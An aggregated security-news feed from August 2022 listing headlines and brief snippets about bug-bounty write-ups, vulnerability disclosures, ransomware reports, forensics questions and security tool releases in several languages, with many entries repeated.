    $7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and much…
    No content preview
  • Open

    SSRF — The Server’s Loophole 01
    No content preview
    Server Side Template Injections Portswiggers Labs Walkthrough Part III
    No content preview
    ‍$7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and…
    No content preview
    SSRF leads to access AWS metadata.
    No content preview
    $7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and much…
    No content preview
  • Open

    SSRF — The Server’s Loophole 01
    No content preview
    Server Side Template Injections Portswiggers Labs Walkthrough Part III
    No content preview
    ‍$7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and…
    No content preview
    SSRF leads to access AWS metadata.
    No content preview
    $7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and much…
    No content preview
  • Open

    Server Side Template Injections Portswiggers Labs Walkthrough Part III
    Hi, My name is Hashar Mujahid, Today we are going to solve some more SSTI labs from Portswiggers. If you want to learn what Server Side… Continue reading on InfoSec Write-ups »
    Cross site request forgery (CSRF) attack
    What is CSRF Continue reading on Medium »
    Brute Force Attack
    What’s a Brute Force Attack? Continue reading on Medium »
    My Hall of Fame at United Nations Success Story
    Hey , Continue reading on Medium »
    SSRF — The Server’s Loophole 01
    Successful Cyberattacks often start at the “Network Perimeter”. Continue reading on InfoSec Write-ups »
    SSRF leads to access AWS metadata.
    Hi Mates, I am Akash Patil (@skypatil98) from India. I am in the bug bounty field from the last 2.5 years. My previous blog is all about… Continue reading on InfoSec Write-ups »
    Capture The bug: For Businesses and Security Researchers
    For Businesses Continue reading on Medium »
    Improper Input Validation Leads To Email Spamming
    Hi Guys, In this article, I will share how did I found Improper Input Validation Leads To Email Spamming on my target (redacted.com) Continue reading on Medium »
    The Million Dollar Hack
    Hacking a leading gift card company with a simple IDOR + Race condition Continue reading on Medium »
    Hack the LAMPSecurity: CTF8 (CTF Challenge)
    Welcome to Hack the LAMPSecurity: CTF8 (CTF Challenge).  download it from https://www.vulnhub.com/entry/lampsecurity-ctf8,87/ Continue reading on Medium »
  • Open

    802.11 Elicit Client / Known MAC Response via Broadcast Frame
    I'm basically a complete novice in the realm of 802.11. I'm specifically interested in if there is a mechanism where I can broadcast a specific management (or other) frame that would elicit a response from a specific MAC address (client, not access point). This would be from the point of view of a random emitter in the area - not as an access point the client is connected to or a client connected to the same access point as a target client. Preferably this would be non-intrusive (e.g. not something like a deauth attack) The actual contents of this response do not matter, I am primarily interested in triggering the emission itself. submitted by /u/gitchery [link] [comments]
    Vulnerability Scanner and PAT/NAT
    We are deploying a vulnerability scanner in a SoC , that is connected to multiple networks over MPLS . Some of the sites have Dynamic NAT. It is my understanding that with this setup Port Scanning will be unreliable , may even cause outage to legitimate traffic due to starvation If at all we are going to NAT , it should be 1 to 1 NAT . Let me know if am wrong in these . submitted by /u/anatoxin123 [link] [comments]
  • Open

    SecWiki News 2022-08-27 Review
    Chrome沙箱绕过研究 by 路人甲 对云函数隐藏C2技术的防御反制思路 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-27 Review
    Chrome沙箱绕过研究 by 路人甲 对云函数隐藏C2技术的防御反制思路 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Java 内存马与 JSP 不得不说的那些事儿
    同样是内存马的基础,我是非常反对一开始上来就去直接看内存马的,看内存马之前起码要先搞清楚普通马是什么,不做脚本小子。
    Java 内存马基础知识 —— Tomcat 架构学习
    写了一篇分析内存马中基础知识的文章,师傅们如有需要可以学习学习
    记一次docker虚拟机横向移动渗透测试
    本次渗透在几个docker虚拟机间多次横向移动,最终找到了一个可以进行docker逃逸的出口,拿下服务器,渗透过程曲折但充满了乐趣。
    窃密恶意软件通过仿冒盗版软件下载网站进行传播
    自从 Napster 在互联网上发布盗版已经有二十余年,海盗湾种子下载站出现也近十年。
    HackTheBox-Responder
    新手靶机,主要了解一些渗透工具/插件的基本使用(Wappalyzer、Responder、john)。
  • Open

    Command Injection in the GitHub Pages Build Pipeline
    submitted by /u/whisperingmime [link] [comments]
    Microsoft: New UEFI CA memory mitigation requirements for signing
    submitted by /u/sanitybit [link] [comments]
    The Elastic Container Project for Security Research
    submitted by /u/sanitybit [link] [comments]
  • Open

    Param Digger! Easy param mining via ZAP
    올해 ZAP의 GSoC 프로젝트는 Param Mining을 하는 AddOn이 선정 되었었습니다. BurpSuite의 Param Miner를 모티브로 쉽게 Mining하는 것이 목표가 되었기에, Scripting과 Fuzzing으로만 Param Mining을 제 입장에선 매우 반가운 소식이였었죠. 어쩌다 보니 스노우볼이 커졌네요..😆 드디어 최근 공식 릴리즈가 되어 블로그에도 정리해봅니다 :D Param Digger Start Mining History, Requset 등 여러 곳에서 우클릭(Context Menu) > Attack > Param Digger 로 Mining 을 시작할 수 있습니다. Options 기본적으로 URL, Header, Cookie에 대해 Guessing이 가능하며 여러 Method, 그리고 Wordlist 또한 사전에 정의된 Predefine나 Custom wordlist를 사용할 수 있습니다. 동작은 Param Miner (BurpSuite)와 유사하게 다수의 파라미터를 한번에 요청하여 Response를 차이를 보고 점점 영향받는 파라미터를 추론하는 방식입니다. 확실히 무작위로 던지는 것 보단 이게 효율적인 것 같습니다. Result 만약 Hidden parameter를 찾았다면 output 탭에서 확인할 수 있습니다. Hot Key Param Digger와 해당 탭에 대한 단축키 지원은 존재합니다. API 아직 지원하지는 않습니다만 Local API에선 Hello world로 만들어놓은 것을 보아 나중에 추가될 가능성도 있어 보입니다. Name confusion Param Digger란 이름은 약간 히스토리가 있습니다. GSoC, 그리고 최초 릴리즈는 Param Miner란 이름으로 릴리즈됬었는데 Albinowax가 이름 충돌에 대한 문제를 이야기하여 결과적으론 Param Digger란 이름으로 교체되었습니다. Conclusion 물론 당분간은 Fuzzing과 Scripting, 그리고 Param Digger를 공통으로 사용하여 진행하겠지만, 점점 Param Digger의 비중이 높아지지 않을까 생각됩니다. 그리고 앞으로 Param Digger에 FAT GET 등 여러가지 Mining 기술들이...
    Jekyll Collection 다루기
    최근에 Jekyll로 다시 이사 후 몇가지 기능들을 개발하고 있습니다. 그 중 하나를 해결하기 위해선 특정 type의 페이지들을 모아서 json으로 만들어주는 과정이 필요한데, Jekyll의 Collection 기능을 이용해서 쉽게 해결했습니다. 오늘은 Jekyll Collection에 대한 이야기를 할까 합니다. Jekyll Collection Jekyll Collection은 Contents를 그룹으로 만들어 관리할 수 있는 기능입니다. 공식 사이트에선 Authors 등 작성자가 여러명이 있는 경우를 예시로 소개 되었지만 사용하기에 따라서 Jekyll 사이트를 좀 더 다채롭게 꾸밀 수 있습니다. Collections are a great way to group related content like members of a team or talks at a conference. Jekyll 개인적으로는 jekyll이 기본으로 제공해주는 pages, posts와 같은 것을 더 만들 수 있다고 이해했습니다. 그리고 실제로 만들어보시면 pages나 posts와 거의 동일하단 것을 알 수 있습니다. In _config.yml Collection을 만들기 위해선 _config.yml에 collections 항목으로 명시해줘야 합니다. 아래와 같이 명시된 경우 ./_newcollections/ 하위 경로가 collection으로 인식하게 됩니다. collections: newcollections: # Collection 이름 output: true # output이 설정되면 접근할 수 있는 페이지가 됩니다. sort_by: name # sort_by로 정렬을 지정할 수 있습니다. order: - first.md - second.md # order를 사용하면 수동으로 정렬을 지정할 수 있습니다. In Liquid 이제 _newcollections 하위 페이지는 newcollections 이란 이름의 collection이 되었고 jekyll 페이지 어디에서든 site.newcollections 으로 호출할 수 있습니다. 저는 아래와 같은 형태로 json 파일을 생성했습니다. [ {% for post in site.newcollections %}...
  • Open

    When Windows Lies
    "When Windows Lies"...what does that really mean?  Mari had a fascinating blog post on this topic some years ago; she talked about the process DFIR analysts had been using to that point to determine the installation date of the operating system. In short...and this has happened several more times since then...while DFIR analysts had been using one process to assess the installation date, Windows developers had changed how this information is stored and tracked in Windows systems, reaffirming the notion that operating systems are NOT designed and maintained with forensic examiners in mind. ;-) The take-away from Mari's blog article...for me, anyway...is the need for analysts to keep up-to-date with changes to the operating system; storage locations, log formats, etc., can (and do) change wi…
  • Open

    A Very Unorganized (and German?) Dir. Marked as NSFW just in case.
    submitted by /u/SatansMoisture [link] [comments]

  • Open

    Matano - An open source serverless security lake platform for AWS using Rust + Apache Iceberg
    submitted by /u/sanitybit [link] [comments]
    Tool Release – JWT-Reauth - a plugin aims to provide a painless solution to this issue. JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope.
    submitted by /u/digicat [link] [comments]
    Zimbra Open Bucket Data Leak – Responsible Disclosure
    submitted by /u/bowline90 [link] [comments]
    Undetectable backdooring PE file
    submitted by /u/InformationSecurity [link] [comments]
    Security in Advanced Analytics and Machine Learning Environments
    submitted by /u/Preatoria [link] [comments]
  • Open

    Encase Remote Collection of CrowdStrike Contained host over VPN
    Hello everyone, We are facing some issues connecting to CrowdStrike contained host which was on VPN before containment from Encase Safe So, the scenario tested: On Prem Host: Encase to host(non-contained) works fine Encase to host(contained) works fine VPN Host(On Citrix) Encase to Host(non-contained) works fine Encase to host(\CONTAINED**) --not working.. We did some packet capture, seems Encase agent sending RST to Safe server. We also did whitelist Encase safe servers, Citrix gateways in Crowdstrike so communication is through, but it didn't solve our issue. Problem seems that once we contain via CrowdStrike it kicks off host off VPN? that maybe making host unreachable from internal EnCase? Has anybody faced similar issue? or any workaround or possible troubleshooting suggestions? This is giving us nightmare as we cannot to any remote collection and can't afford taking any infected host off contained state. Thanks in advance! submitted by /u/ANTBW1 [link] [comments]
    Remote Collection of Gmail
    Braintrust, What are some current methods and suggestions for forensically sound acquisition of the contents of a Gmail account (I have consent from the client)? I have a test Gmail account that I requested a dump of the email via Google Takeout which I understand is provided in mbox format (still waiting on data). I am aware that some tools have the ability to ingest Google Takeout data (e..g, Recon_Lab). Any thoughts on the above? Any success with Axiom or PA Cloud? Anything else? Thanks. submitted by /u/Sir_Agent_Apple [link] [comments]
  • Open

    Centipede – a distributed fuzzing engine. Work-in-progress
    Article URL: https://github.com/google/centipede Comments URL: https://news.ycombinator.com/item?id=32612084 Points: 2 # Comments: 0
    Show HN: Jazzer.js – Fuzzing for JavaScript is now effective
    Article URL: https://github.com/CodeIntelligenceTesting/jazzer.js Comments URL: https://news.ycombinator.com/item?id=32606206 Points: 8 # Comments: 1
  • Open

    Privilege Escalation - "Analyst" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]
    LinkedIn disclosed a bug submitted by naaash: https://hackerone.com/reports/1572591 - Bounty: $500
  • Open

    SheHacksKE KCA Intervarsity CTF — 2022 Write up
    A short write up for some ctf challenges held at KCA University during the intervarsity bootcamp by SheHacksKE. Challenge link… Continue reading on Medium »
    How to check if the Russian law was violated?
    Let’s consider ways of OSINT-solution of a standard task of any security service — obtaining data on criminal and administrative… Continue reading on Medium »
  • Open

    Threat Hunting Tools: Our Recommendations
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Eavesdropping: Does it cost €8,000,000 to buy Predator spyware?
    submitted by /u/anusec [link] [comments]
  • Open

    MetaMask Security Monthly: August 2022
    Security Lab Continue reading on Medium »
    Space Bug Bounty program
    Welcome to ENEX.SPACE Bug Bounty program Continue reading on ENEX.SPACE »
    Sometimes times the best hack is no hack at all — $2900 Shopify Bug Bounty
    Access control is key. Continue reading on InfoSec Write-ups »
    Break the Logic: 5 Different Perspectives in Single Page (€1500)
    Hello everyone. Today I’m going to talk about five different vulnerabilities that I found on a single page. Three of these vulnerabilities… Continue reading on InfoSec Write-ups »
    Why another Bug Bounty platform when we have HackerOne?
    HackerOne is a great platform, but it’s US-based and doesn’t understand/cater to New Zealand businesses’ needs. Continue reading on Medium »
    XSS-VDP-HACKERONE
    In this tutorial you will learn, how I just found xss vulnerability in the register page of VDP website in hackerone and how I bypassed… Continue reading on Medium »
  • Open

    SecWiki News 2022-08-26 Review
    我与入侵检测的二三事儿 by ourren 2022半年度反洗钱处罚信息汇总及分析 by ourren Ruby安全漫谈 by ourren 如何开展蓝军工作与量化评估 by ourren 匿名:《红队攻击安全配置》 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-26 Review
    我与入侵检测的二三事儿 by ourren 2022半年度反洗钱处罚信息汇总及分析 by ourren Ruby安全漫谈 by ourren 如何开展蓝军工作与量化评估 by ourren 匿名:《红队攻击安全配置》 by ourren 更多最新文章,请访问SecWiki
  • Open

    Critical command injection vulnerability discovered in Bitbucket Server and Data
    Article URL: https://portswigger.net/daily-swig/critical-command-injection-vulnerability-discovered-in-bitbucket-server-and-data-center Comments URL: https://news.ycombinator.com/item?id=32608967 Points: 2 # Comments: 0
  • Open

    OTE — E-mail Temporário via Terminal
    ote é uma ferramenta desenvolvida em Python que gera endereços de e-mail temporários e extrai automaticamente OTPs ou links de confirmação… Continue reading on 100security »
    Introduction to PsExec and its Detections
    What is PsExec? Continue reading on Medium »
  • Open

    老挝数据合规重点解读
    据世界银行消息,与其他可比区域经济体相比,老挝在互联网服务的可访问性、质量和可负担性等方面都明显落后。
    FreeBuf早报 | 上半年DDoS攻击暴增203%;工信部通报47款侵害用户权益App和SDK
    工信部通报存在问题的 App(SDK)名单显示, 神州专车、网鱼、虎扑、零跑、宝沃汽车、奔腾 YOMI 等应用在列 。
    曾攻击过云通讯巨头Twilio的黑客,在数月内连续攻击130多个组织
    在8月初接连攻击云通讯巨头Twilio和云服务商Cloudflare后,攻击者逐渐浮出水面。
    斗象科技2022新品发布会「漏洞情报产品」亮相
    2022-8-27 10:00:00|2022-8-27 23:59:59
    FreeBuf周报 | 苹果曝严重安全漏洞喜提热搜第一;LockBit 团伙遭受 DDoS 攻击
    本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    黑客正使用AiTM攻击监控企业高管的 Microsoft 365 帐户
    这是一种典型的商业电子邮件泄露攻击,目的很可能是将大笔资金交易转移到攻击者控制的银行账户中。
    疑因泄露受害者数据,LockBit团伙遭受DDoS攻击
    此次 DDoS 攻击似乎是对其曝光安全公司 Entrust 被盗数据的报复。
    简易高效的供应链攻击—依赖混淆
    依赖混淆(Dependency Confusion)一种简易而又高效的供应链攻击方式,影响多家大型科技公司,并获取远超10万美元的漏洞赏金。
  • Open

    项目推荐:XPEViewer
    作者:horsicq 项目名称:XPEViewer 项目地址:https://github.com/horsicq/XPEViewer 适用于Windows、Linux和MacOS的PE文件查看器/编辑器。 1. 下载: https://github.com/horsicq/XPEViewer/releases 2. 如何运行: https://github.com/horsicq/XPE...
  • Open

    项目推荐:XPEViewer
    作者:horsicq 项目名称:XPEViewer 项目地址:https://github.com/horsicq/XPEViewer 适用于Windows、Linux和MacOS的PE文件查看器/编辑器。 1. 下载: https://github.com/horsicq/XPEViewer/releases 2. 如何运行: https://github.com/horsicq/XPE...
  • Open

    Sometimes times the best hack is no hack at all — $2900 Shopify Bug Bounty
    Access control is key. Continue reading on InfoSec Write-ups »
    Bypassing unexpected IDOR
    No content preview
    Stored XSS using SVG file
    No content preview
    Break the Logic: 5 Different Perspectives in Single Page (€1500)
    No content preview
  • Open

    Sometimes times the best hack is no hack at all — $2900 Shopify Bug Bounty
    Access control is key. Continue reading on InfoSec Write-ups »
    Bypassing unexpected IDOR
    No content preview
    Stored XSS using SVG file
    No content preview
    Break the Logic: 5 Different Perspectives in Single Page (€1500)
    No content preview
  • Open

    Sometimes times the best hack is no hack at all — $2900 Shopify Bug Bounty
    Access control is key. Continue reading on InfoSec Write-ups »
    Bypassing unexpected IDOR
    No content preview
    Stored XSS using SVG file
    No content preview
    Break the Logic: 5 Different Perspectives in Single Page (€1500)
    No content preview
  • Open

    Credentials Stealing via XSS (Cookie Stealing)
    Cookie stealing allows to grab password which are saved in the browser password manager of the victim. Continue reading on Medium »
    XSS-VDP-HACKERONE
    In this tutorial you will learn, how I just found xss vulnerability in the register page of VDP website in hackerone and how I bypassed… Continue reading on Medium »
  • Open

    HTB Assessment
    Is anyone up to collab a private HTB Assessment? It has 6 machines and only 2 days. Let me know! Thanks in advance! submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Why is TeamViewer offering different versions of their installer for download depending on your geographic location?
    This is the second time this is happened. I notice because we use a third-party tool to deploy app updates and it (rightfully) refuses to deploy one when the hash is different than expected. Here are the VirusTotal links for the 64-bit download. US version: VirusTotal - File - 56bedaf015c0e610c26607fe47162445354870f66c3080f7fa55000f825798eb International version: VirusTotal - File - 3427c194abd6ff53f609df56bd2064b2903491f90184c5edd819f3d220842540 submitted by /u/QworpVoop [link] [comments]

  • Open

    Did I get hacked
    So I did something stupid. I clicked on an add for an app on TikTok (which is stupid I know) and it Took me to what looked like the App Store for iOS and after I clicked install it prompted me to enter my password… And I think after I entered my password I just sort of close the app and forgot about it. Just a bit ago I thought oh… I should check out that app, only to see that it was not installed and there was no record of me downloading the app in the App Store. I changed my iOS password as well as my bank password to be safe, but I have not noticed any sort of unusual activity on anything. Almost everything that has two factor authentication is turning on. Edit-my wife thinks maybe it was actually a legit add and perhaps after I entered my password I needed to hit instead again and I neglected to do that so the app never actually installed. submitted by /u/histtohrev [link] [comments]
    Template for responding to phishing email inquiries
    A user wants confirmation if a link is safe to visit. What does your response email look like? What key points do you make in every response? ​ Example: Hi Bob, This email is Malicious. This is a phishing attempt and not legitimate Microsoft Support. Please delete the email from your inbox. If you clicked on this link or interacted with this email in anyway, please let us know. Thanks, Alice submitted by /u/Jaruki_Jurakami [link] [comments]
    How does your company do Incident Reports?
    Do you write the reports as they happen? Past-tense vs present-tense writing? Every action down to the minute or a high-level overview only? submitted by /u/Jaruki_Jurakami [link] [comments]
    Vulnerability Scanning Checklist?
    What are some things to consider when planning and executing vulnerability scans in an enterprise environment? Examples: What time to run scans? How often? Authenticated vs Not-authenticated? Agent vs Agentless? etc Links to good resources also welcome. submitted by /u/Jaruki_Jurakami [link] [comments]
    What are some good YouTube channels, TV shows or articles to use to expand cybersecurity knowledge?
    Hi I am always looking to expand my cybersecurity skills and knowledge whether it be doing new certs or even just attending conferences. Now I want to take it one step further and start getting more exposure to cybersecurity stuff like the latest scams. For example, I recently watched a video why it is bad idea to take photos of your keys and how it can be printed using a 3D printer. What are some good YouTube channels, TV shows or articles to use to expand cybersecurity knowledge? submitted by /u/securm0n [link] [comments]
    SANS SEC575 Alternative?
    Can anybody recommend an alternative to SANS SEC575 (Mobile Device Security and Ethical Hacking)? Unfortunately the cost of SANS training now exceeds my company's annual reimbursement threshold. I'm primarily interested in in-person or live virtual offerings. Thanks! ETA: I'm not concerned about whether or not there is a certification associated with a course. I just want the training. submitted by /u/koei19 [link] [comments]
    Do I Need IDS?
    Hi. I asked a question a few days ago about how to monitor network traffic on my Mac and PC and got the suggestion to try Security Onion. I spent the whole of 5 seconds researching it and closed the browser when I saw that it worked on Linux only. My uneducated self had no clue. I was so bummed by the suggestion I threw a hissy fit and deleted the thread. Since then, I've been continuing my cybersecurity research and somehow ended up giving Security Onion a lengthier look. Thankfully I can still see the one particular response that was actually exactly what I was looking for i.e. that Security Onion works with monitoring traffic and logs for Mac, Linux and Windows which are the three environments that I use for my work. Anyway, I spent the last few days researching Security Onion and that got me wondering. It's a lot of effort and not free. I don't have a cybersecurity background so understanding the logs/alerts will be a struggle. I'll also need to purchase a server and watch the paid training that SO offer on their site. But I gather the SO videos aren't all that I'll need to succeed with this whole thing. Having said that, I like a challenge, I like learning something new and I don't mind spending the time, money and energy into this whole thing, if it's necessary - I do have stuff to do to make my product which is not related to this whole cybersecurity thing. But I was mainly wondering, yay, or nay? Do I need to go down the rabbit hole for my business? How imperative is an IDS? I'm already setting up firewalls, but I'm fully aware of the blind spot that results from not including IDS in to the mix. But can a one man shop realistically review all the logs and alerts and the sheer volume of data that will be generated by my network? Or should I do it to the best of my abilities because it's better than nothing? submitted by /u/Jastibute [link] [comments]
  • Open

    实战复盘:内网环境渗透ms-SQL数据库
    web服务器、ms-SQL服务器、PC客户端在同一个网络中,是一种危险的网络结构,入侵ms-SQL服务器,非常容易。
    RSA主要攻击方法
    RSA算法是由Rivest、Shamir和Adleman开发的1种非对称加密算法,在此算法中公钥和私钥将会配合使用。
    【漏洞复现】shiro 反序列化 (CVE-2016-4437)
    Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。
    拒绝面子工程,提升安全可视化实用性 | FreeBuf甲方群话题讨论
    安全可视化近些年被行业寄予厚望,但在实际运用中是否真如大家所愿,如何避免沦为一块徒有其表的面子工程?
    FreeBuf早报 | 斥巨资拍下豪车,因黑客攻击无法提车;俄恶意软件颠覆AD FS身份验证
    一名男子在拍卖平台花2200万拍下一辆柯尼塞格Regera超跑,提车时拍卖平台告知,因为受到黑客攻击,导致拍卖结果有误。
    从WPS到百度网盘,我们真的“活在监控之下”?
    两次事件再次勾起了网友那些埋藏深底的,对个人隐私安全深深的忧虑,内容安全和隐私保护的边界又在哪里?
    谷歌发现伊朗黑客新工具,可窃取Gmail、雅虎、Outlook等电子邮件账户
    Charming Kitten在其恶意软件库中增加了一个新工具,可以从Gmail、雅虎和微软Outlook账户中检索用户数据。
    多米尼加共和国政府机构遭受勒索软件攻击
    多米尼加共和国的多米尼加农业研究所(Instituto Agrario Dominicano)遭到了 Quantum 勒索软件的疯狂攻击。
    恶意程序正潜入盗版3DMark等软件进行传播
    这些恶意盗版软件网站在Google上还有着十分靠前的搜索排名。
    如何使用MrKaplan在红队活动中隐藏和清理代码执行痕迹
    MrKaplan可以帮助广大红队研究人员清理和隐藏活动中的代码执行痕迹。
  • Open

    Cold technique metasploit local permissions exploitation suggestion
    #lownsec777 Continue reading on Medium »
    Let’s talk about my beginnings in security research
    Hello bugbounty community , i started hunting since 9 months after having succeeded my OSCP certification in november 2021. (Link to my… Continue reading on Medium »
    SQL Injection
    In this section, I’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL… Continue reading on Medium »
    Top Golang Bug Bounty tools and repositories on Github
    Continue reading on Medium »
    This SIMPLE trick will exploit image uploads - $2500 TikTok bug bounty.
    Stored XSS in SVG files. Continue reading on InfoSec Write-ups »
    Easy & Step-By-Step Ways of Finding Bugs in Software
    The bug is one of the most horrifying words for many developers. Even many experienced and highly skilled developers encounter bugs as it… Continue reading on Medium »
  • Open

    Asking for advice on sharing Axiom portable cases with detectives
    Hello, I work as a CSI for a smaller department and as such I am in charge of most if not all digital evidence in our investigations unit. We currently utilize a GrayKey to extract phones and Axiom to process the images. The problem I am having is it takes a couple days for me to extract, process, create portable case, extract to usb and share with detectives. Our department can't afford to set up for Magnet Review which was my first option. I was just wondering if anyone has advice for setting up something myself or if someone is in a similar situation. Thank you submitted by /u/nub_cho [link] [comments]
    Incident Response : Analysing an old "ransomwared" VM
    Hello everyone, I recently got interested in Forensics and got the chance to play with Autopsy and Volatility in several CTFs, but I don't know exactly how can we get these logs from a Windows Server. I have an infected VM that I want to turn on to get the logs and do an investigation on that server to test my capabilities in a real world situation : How to do turn on the VM in a secure way, without impacting the network again ? What if it was a real physical server. How to collect logs of a Windows Server What are the steps to take after my network got owned Any online ressources and advices are welcomed :) Thank you for your time. submitted by /u/aes256bits [link] [comments]
    Windows Base File and Hash Search
    Hi, I need to find some DLL file hashes from different operating systems like Windows 7, Windows 8, Windows 10, etc. I can't remember the GitHub project name or website indexes all Windows base files, and there was a search function, too. So how can I access file hashes after the operating system is installed, and nothing has changed? May you propose any project which gives an online search function that has search functions like hash search, file name search, etc.? Regards. submitted by /u/kaptangenzosan [link] [comments]
    Digital Forensic Analysis Career
    As I am very tech savvy I am looking into a career in the digital forensic field , particularly at a bank or even law enforcement. I am 20 and have my GED. I hear I need to get my bachelors degree. Do I just go to college for a degree in computer forensics? Also looking to be a information security analyst submitted by /u/ALPHAMATE9 [link] [comments]
  • Open

    LastPass Recent Security Incident
    submitted by /u/zwamkat [link] [comments]
    Guide to Using Secrets Management in Enterprise
    submitted by /u/mesok8 [link] [comments]
    Free SANS Workshop: Building an Azure Pentest Lab for Red Teams
    submitted by /u/sanitybit [link] [comments]
    IAM Whoever I Say IAM :: Infiltrating VMWare Workspace ONE Access Using a 0-Click Exploit
    submitted by /u/albinowax [link] [comments]
    Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus
    submitted by /u/CyberMasterV [link] [comments]
    MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone - Microsoft Security Blog
    submitted by /u/gid0rah [link] [comments]
    2-byte DoS in freebsd-telnetd / netbsd-telnetd / netkit-telnetd / inetutils-telnetd / telnetd in Kerberos Version 5 Applications - Binary Golf Grand Prix 3
    submitted by /u/PierreKimSec [link] [comments]
    Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)
    submitted by /u/sanitybit [link] [comments]
    Uncovering a ChromeOS remote memory corruption vulnerability
    submitted by /u/sanitybit [link] [comments]
    whids - Open Source EDR for Windows
    submitted by /u/sanitybit [link] [comments]
  • Open

    Threat Assessment: Black Basta Ransomware
    Black Basta is ransomware as a service (RaaS) that first emerged in April 2022. However, evidence suggests that it has been in development since February. The Black Basta operator(s) use the double extortion technique, meaning that in addition to encrypting files on the systems of targeted organizations and demanding ransom to make decryption possible, they also maintain a dark web leak site where they threaten to post sensitive information if an organization chooses not to pay ransom. The post Threat Assessment: Black Basta Ransomware appeared first on Unit 42.
  • Open

    Advent of Cyber 3 (2021): Day 16 Write-up [TryHackMe]
    Welcome to Day 16 write-up, and I hope you find it helpful. Continue reading on System Weakness »
  • Open

    SecWiki News 2022-08-25 Review
    Antenna: 漏洞辅助验证存在与可利用性平台 by ourren 固件渗透的攻防之路 by ourren 如何对登录接口加密字段进行暴破? by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-25 Review
    Antenna: 漏洞辅助验证存在与可利用性平台 by ourren 固件渗透的攻防之路 by ourren 如何对登录接口加密字段进行暴破? by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Is it safe to whitelist access based on user agents?
    One of my users wants to use a 3rd party tool to crawl our website (for SEO analysis, etc). However they are requesting to have it whitelisted. I believe they want to whitelist the user agent. My question is, is it safe to whitelist based on user agents? Makes me nervous, user agents are really not unique correct? Dont we all have user agents? out of the millions/billions of people online, im sure many have the same. submitted by /u/87390989 [link] [comments]
    More Hackers Adopt Sliver Toolkit as a Cobalt Strike Alternative
    submitted by /u/anusec [link] [comments]
    Creating Honeypot Access Points using Hostapd
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Unauthorized access
    GitLab disclosed a bug submitted by mega7: https://hackerone.com/reports/1669176
    Non-revoked API Key Information disclosure via Stripo_report()
    Stripo Inc disclosed a bug submitted by deb0con: https://hackerone.com/reports/1613714
    Default Login Credentials on https://broadbandmaps.mtn.com.gh/
    MTN Group disclosed a bug submitted by theranger: https://hackerone.com/reports/1297480
    Pause-based desync in Apache HTTPD
    Internet Bug Bounty disclosed a bug submitted by albinowax: https://hackerone.com/reports/1667974 - Bounty: $4000
  • Open

    Exploiting PrintNightmare (CVE-2021–34527)
    This post provides a high-level overview of the PrintNightmare vulnerability and demonstrates successful exploitation against a Windows… Continue reading on InfoSec Write-ups »
    ‍Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much…
    No content preview
    Write-up: Host header authentication bypass @ PortSwigger Academy
    No content preview
    This SIMPLE trick will exploit image uploads - $2500 TikTok bug bounty.
    Stored XSS in SVG files. Continue reading on InfoSec Write-ups »
    Server Side Template Injections Portswiggers Labs Walkthrough.
    No content preview
    How I found my first RCE!
    No content preview
    Cool Recon techniques every hacker misses!
    No content preview
    Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much more…
    No content preview
  • Open

    Exploiting PrintNightmare (CVE-2021–34527)
    This post provides a high-level overview of the PrintNightmare vulnerability and demonstrates successful exploitation against a Windows… Continue reading on InfoSec Write-ups »
    ‍Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much…
    No content preview
    Write-up: Host header authentication bypass @ PortSwigger Academy
    No content preview
    This SIMPLE trick will exploit image uploads - $2500 TikTok bug bounty.
    Stored XSS in SVG files. Continue reading on InfoSec Write-ups »
    Server Side Template Injections Portswiggers Labs Walkthrough.
    No content preview
    How I found my first RCE!
    No content preview
    Cool Recon techniques every hacker misses!
    No content preview
    Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much more…
    No content preview
  • Open

    Exploiting PrintNightmare (CVE-2021–34527)
    This post provides a high-level overview of the PrintNightmare vulnerability and demonstrates successful exploitation against a Windows… Continue reading on InfoSec Write-ups »
    ‍Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much…
    No content preview
    Write-up: Host header authentication bypass @ PortSwigger Academy
    No content preview
    This SIMPLE trick will exploit image uploads - $2500 TikTok bug bounty.
    Stored XSS in SVG files. Continue reading on InfoSec Write-ups »
    Server Side Template Injections Portswiggers Labs Walkthrough.
    No content preview
    How I found my first RCE!
    No content preview
    Cool Recon techniques every hacker misses!
    No content preview
    Bug Bounty Tips, Desync Attacks, SSRF, SQL Injection, Vulnerabilities in CPU, RCE, and much more…
    No content preview
  • Open

    My Top 3 HACKING Tools
    For a Penetration Tester the right methodology is key. In order to implement that methodology, it is still crucial to have some sort of a… Continue reading on System Weakness »
    Day 62 #100DaysOfHacking
    PMAT Lab continued Continue reading on Medium »
  • Open

    Adult content and other stuff
    http://54.39.52.63/ submitted by /u/RainyAbrar [link] [comments]
